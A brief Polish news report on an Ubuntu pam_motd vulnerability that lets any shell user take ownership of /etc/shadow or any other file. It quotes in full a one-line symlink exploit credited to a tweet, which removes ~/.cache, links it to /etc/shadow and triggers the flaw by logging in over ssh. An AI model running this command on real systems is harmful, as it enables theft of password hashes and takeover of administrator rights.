W Ubuntu znajduje się luka, umożliwiająca każdemu użytkownikowi dziecinnie proste przejęcie praw administratora.

Kilka godzin temu na Twitterze Jona Oberheide’a ukazała się informacja o następującej treści:

rm -rf ~/.cache; ln -s /etc/shadow ~/.cache; ssh localhost (trigger pam_motd by re-logging in and you’ll own /etc/shadow) #tweetsploits

Wykorzystując powyższą metodę dowolny użytkownik Ubuntu mający dostęp do shella może przejąć na własność plik /etc/shadow, odpowiadający za przechowywanie informacji służących do uwierzytelniania użytkowników, lub dowolny inny plik w systemie.

Nie wiadomo, od kiedy dziura jest znana “złym ludziom”.